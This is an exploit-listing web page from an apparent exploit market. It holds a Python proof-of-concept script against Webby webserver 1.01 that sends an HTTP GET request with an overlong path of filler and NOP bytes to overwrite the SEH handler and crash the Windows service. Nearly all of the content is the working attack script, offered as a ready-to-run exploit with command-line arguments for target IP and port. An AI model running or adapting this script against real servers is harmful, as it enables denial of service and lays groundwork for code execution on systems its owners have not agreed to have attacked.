[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Webby webserver SEH control (0day) PoC

Author
Timo Gaik
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12395
Category
dos / poc
Date add
25-05-2010
Platform
windows
======================================
Webby webserver SEH control (0day) PoC
======================================


#!/usr/bin/python
 
##POC details:
##
##SEH overwritten
##
##contact:  m1k3@m1k3.at
##      http://www.s3cur1ty.de
 
##App detail:
##
#http://www.shareware.de/webby-webserver/
#Version        1.01
#Autor      Timo Gaik
#Lizenzart  Freeware
#Plattformen    Win XP, Win 98, Win ME
#Letztes Update 19.10.2004
#Dateigroesse   701 KB
 
import socket
import sys
import os.path
import time
 
if len(sys.argv) < 2:
    print "Usage: webby.py <IP-Adr> <port>"
    sys.exit(0)
 
ips = sys.argv[1]
port = int(sys.argv[2])
 
string = "A"*790
string += "\x90"*4 
string += "\x42"*105       
 
method = "GET"
print "starting POC for:", ips
print ""
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    connect=s.connect((ips, port))
except:
    print "no connection possible"
    sys.exit(1)
 
payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'
 
print "\r\nsending payload"
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))
print "..."
 
print payload
s.send(payload)
print "finished kicking method %s with payload %s" % (method,payload)
print "... the service should be crashed ... check SEH"



#  0day.today [2024-11-15]  #